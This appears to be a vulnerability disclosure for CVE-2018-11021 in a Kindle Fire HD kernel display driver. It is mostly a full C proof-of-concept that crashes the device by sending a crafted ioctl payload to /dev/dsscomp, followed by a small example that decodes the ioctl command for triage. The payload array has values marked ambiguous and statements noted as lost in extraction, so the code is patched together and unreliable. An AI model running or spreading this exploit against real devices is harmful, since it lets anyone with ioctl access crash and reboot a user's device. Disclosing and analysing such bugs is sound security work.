(CVE-2018-11021) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

Uploaded by: p** Document ID: 493964 Upload date: 2023-09-19 Format: DOCX Pages: 3 Size: 8.76 KB

1. Vulnerability overview

The kernel module omap/drivers/video/omap2/dsscomp/device.c in the kernel component of Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 allows an attacker to inject a crafted argument through the argument of an ioctl on the device /dev/dsscomp with the command 1118064517 and cause a kernel crash. To exploit this vulnerability, the device file /dev/dsscomp must be opened and the ioctl system call invoked on that device file with the command 1118064517 and a crafted payload as the third argument.

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC

    /*
     * This is poc of Kindle Fire HD 3rd
     * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
     * Related buggy struct name is dsscomp_setup_dispc_data.
     * This Poc should run with permission to do ioctl on /dev/dsscomp.
     */
    #include <stdio.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/ioctl.h>

    static const char *driver = "/dev/dsscomp";
    static unsigned int command = 1118064517;

    int main(int argc, char **argv, char **env)
    {
        /* Crafted argument passed as the third ioctl parameter. */
        unsigned int payload[] = {
            0xffffffff, 0x00000003, 0x5d200040, 0x79900008, 0x8f5928bd, 0x78b02422,
            0x00000000, /* source reads "0X000000004" here; ambiguous */
            0xffffffff, 0xf4c50400, 0x007fffff, 0x8499f562, 0xffff0400, 0x001b131d,
            0x60818210, 0x00000007, 0xffffffff, 0x00000000, 0x9da9041c, 0xcd980400,
            0x001f03f4, 0x00000007, 0x2a34003f, 0x7c80d8f3, 0x63102627, 0xc73643a8,
            0xa28f0665, 0x00000000, 0x689e57b4, 0x01ff0008, 0x5e7324b1, 0xae3b003f,
            0x0b174d86, 0x00000400,
            0x21ffff37, /* source reads "0x2:Iffff37" here; ambiguous */
            0xceb367a4, 0x00000040, 0x00000001, 0xec000f9e, 0x00000001, 0x000001ff,
            0x00000000, 0x00000000, 0x0000000f, 0x0425c069, 0x038cc3be, 0x0000000f,
            0x00000080, 0xe5790100, 0x5b1bffff, 0x0000d355, 0x0000c685, 0xa0070000,
            0x0010ffff, 0x00a0ff00, 0x00000001, 0xff490700, 0x0832ad03, 0x00000006,
            0x00000002, 0x00000001, 0x81f871c0, 0x738019cb, 0xbf47ffff, 0x00000040,
            0x00000001, 0x7f190f33, 0x00000001, 0x8295769b, 0x0000003f, 0x869f2295,
            0xffffffff, 0xd673914f, 0x05055800, 0xed69b7d5, 0x00000000, 0x0107ebbd,
            0xd214af8d, 0xffff4a93, 0x26450008, 0x58df0000, 0xd16db084, 0x03ff30dd,
            0x00000001, 0x209aff3b, 0xe7850800, 0x00000002, 0x30da815c, 0x426f5105,
            0x0de109d7, 0x2c1a65fc, 0xfcb3d75f, 0x00000000, 0x00000001, 0x8066be5b,
            0x00000002, 0xffffffff, 0x5cf232ec, 0x680d1469, 0x00000001, 0x00000020,
            0xffffffff, 0x00000400, 0xd1d12be8, 0x02010200, 0x01ffc16f, 0xf6e237e6,
            0x007f0000, 0x01ff08f8, 0x000f00f9, 0xbad07695, 0x00000000, 0xbaff0000,
            0x24040040, 0x00000006, 0x00000004, 0x00000000, 0xbc2e9242, 0x009f5f08,
            0x00800000, 0x00000000, 0x00000001, 0xff8800ff, 0x00000001, 0x00000000,
            0x000003f4, 0x6faa8472, 0x00000400, 0xec857dd5, 0x00000000, 0x00000040,
            0xffffffff, 0x3f004874, 0x0000b77a, 0xec9acb95, 0xfacc0001, 0xffff0001,
            0x0080ffff, 0x3600ff03, 0x00000001, 0x8fff7d7f, 0x6b87075a, 0x00000000,
            0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x001001ff, 0x00000000,
            0x00000001, 0xff1f0512, 0x00000001, 0x51e32167, 0xc18c55cc, 0x00000000,
            0xffffffff, 0xb4aaf12b, 0x86edfdbd, 0x00000010, 0x0000003f, 0xabff7b00,
            0xffff9ea3, 0xb28e0040, 0x000fffff, 0x458603f4, 0xffff007f, 0xa9030f02,
            0x00000001, 0x002cffff, 0x9e00cdff, 0x00000004, 0x41414141, 0x41414141,
            0x41414141, 0x41414141
        };
        int fd = 0;

        fd = open(driver, O_RDWR);
        if (fd < 0) {
            /* A statement here was lost in extraction; only its tail,
             * the path /data/local/tmp/log, survives in the source. */
            return -1;
        }
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if (ioctl(fd, command, payload) < 0) {
            /* As above: the original statement ending in /data/local/tmp/log is lost. */
            return -1;
        }
        close(fd);
        return 0;
    }

Crash log

To be added here
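For triage, the command number 1118064517 named above can be split into its ioctl fields to locate the handler and the size of the argument it expects. This is an added example, not part of the original PoC; it assumes the asm-generic `_IOC` bit layout that ARM Linux uses, and the type and function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed asm-generic layout (used by ARM Linux):
 * bits 0-7 nr, 8-15 type, 16-29 size, 30-31 direction. */
struct ioctl_fields {        /* hypothetical helper type */
    unsigned dir;            /* 0 none, 1 write (user -> kernel), 2 read */
    unsigned size;           /* argument size in bytes, as encoded in the command */
    unsigned char type;      /* driver "magic" character */
    unsigned nr;             /* command index within the driver */
};

static struct ioctl_fields decode_ioctl(uint32_t cmd)
{
    struct ioctl_fields f;
    f.nr   = cmd & 0xffu;
    f.type = (unsigned char)((cmd >> 8) & 0xffu);
    f.size = (cmd >> 16) & 0x3fffu;
    f.dir  = (cmd >> 30) & 0x3u;
    return f;
}

/* Number of 32-bit words needed to cover the encoded argument size. */
static unsigned arg_words(struct ioctl_fields f)
{
    return (f.size + 3u) / 4u;
}

static const char *dir_name(unsigned dir)
{
    static const char *names[] = {
        "none", "write (user -> kernel)", "read (kernel -> user)", "read/write"
    };
    return names[dir & 3u];
}

int main(void)
{
    struct ioctl_fields f = decode_ioctl(1118064517u);  /* command from the PoC */
    printf("dir=%s type='%c' nr=%u size=%u bytes (%u words)\n",
           dir_name(f.dir), f.type, f.nr, f.size, arg_words(f));
    return 0;
}
```

By the `_IOW` convention the size field equals the size of the argument struct, which points a reviewer at the handler's copy-in of that struct and the bounds checks on its fields.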
